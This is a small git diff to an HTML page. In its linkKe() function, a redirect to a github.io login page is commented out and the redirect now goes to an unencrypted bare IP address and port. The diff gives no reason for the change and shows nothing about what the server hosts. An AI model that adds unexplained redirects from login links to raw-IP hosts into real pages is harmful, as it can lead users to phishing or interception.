--- a/index.html
+++ b/index.html
@@ -14,7 +14,8 @@
     </div>
     <script>
         function linkKe() {
-          window.location.href = "https://asetbppkad.github.io/login_alternate.github.io";
+          // window.location.href = "https://asetbppkad.github.io/login_alternate.github.io";
+          window.location.href = "http://103.146.132.145:9637/";
         }
       </script>
   </body>
